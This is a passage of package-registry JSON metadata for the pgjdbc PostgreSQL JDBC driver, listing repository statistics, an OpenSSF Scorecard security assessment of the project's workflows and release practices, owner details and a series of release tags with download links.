count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-osgi-test/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":608482,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":5073416,"name":"org.postgresql:pgjdbc-aggregate","ecosystem":"maven","description":"PgJDBC aggregate project","homepage":"https://github.com/pgjdbc/pgjdbc","licenses":"The PostgreSQL License","normalized_licenses":["PostgreSQL"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"org.postgresql","versions_count":25,"first_release_published_at":"2015-12-22T20:23:34.000Z","latest_release_published_at":"2020-03-31T19:02:14.000Z","latest_release_number":"42.2.12","last_synced_at":"2026-06-18T19:14:21.642Z","created_at":"2022-07-28T11:33:41.166Z","updated_at":"2026-06-18T19:14:21.642Z","registry_url":"https://central.sonatype.com/artifact/org.postgresql/pgjdbc-aggregate/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.postgresql/pgjdbc-aggregate/","metadata":{"distribution_repositories":["https://oss.sonatype.org/service/local/staging/deploy/maven2","https://oss.sonatype.org/content/repositories/snapshots"]},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[{"name":"REL42.7.10","sha":"27571c8e18712e7fc6a007bd38ab8e3d6c309c0c","kind":"commit","published_at":"2026-02-11T18:55:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10/manifests"},{"name":"REL42.7.9","sha":"79b784e3a63def9d12088471334399a53016d880","kind":"commit","published_at":"2026-01-15T18:02:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9/manifests"},{"name":"REL42.7.8","sha":"9a5492d99ce43507e318ce4bb56030f74b773d48","kind":"commit","published_at":"2025-09-18T21:10:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8/manifests"},{"name":"REL42.7.7","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T10:13:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7/manifests"},{"name":"REL42.7.7-rc1","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T09:56:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1/manifests"},{"name":"REL42.7.6","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:24:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6/manifests"},{"name":"REL42.7.6-rc1","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:13:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1/manifests"},{"name":"REL42.7.5","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T15:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5/manifests"},{"name":"REL42.7.5-rc1","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T14:58:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1/manifests"},{"name":"REL42.7.4","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T16:44:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4/manifests"},{"name":"REL42.7.4-rc1","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T14:09:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1/manifests"},{"name":"REL42.2.30-rc1","sha":"c6bbbc2ccc44cf099bf6b5973896a97636c5e32b","kind":"tag","published_at":"2024-04-09T12:32:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.30-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.30-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.30-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1/manifests"},{"name":"REL42.7.3","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:45:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3/manifests"},{"name":"REL42.7.3-rc1","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:42:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1/manifests"},{"name":"REL42.6.2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2/manifests"},{"name":"REL42.6.2-rc2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":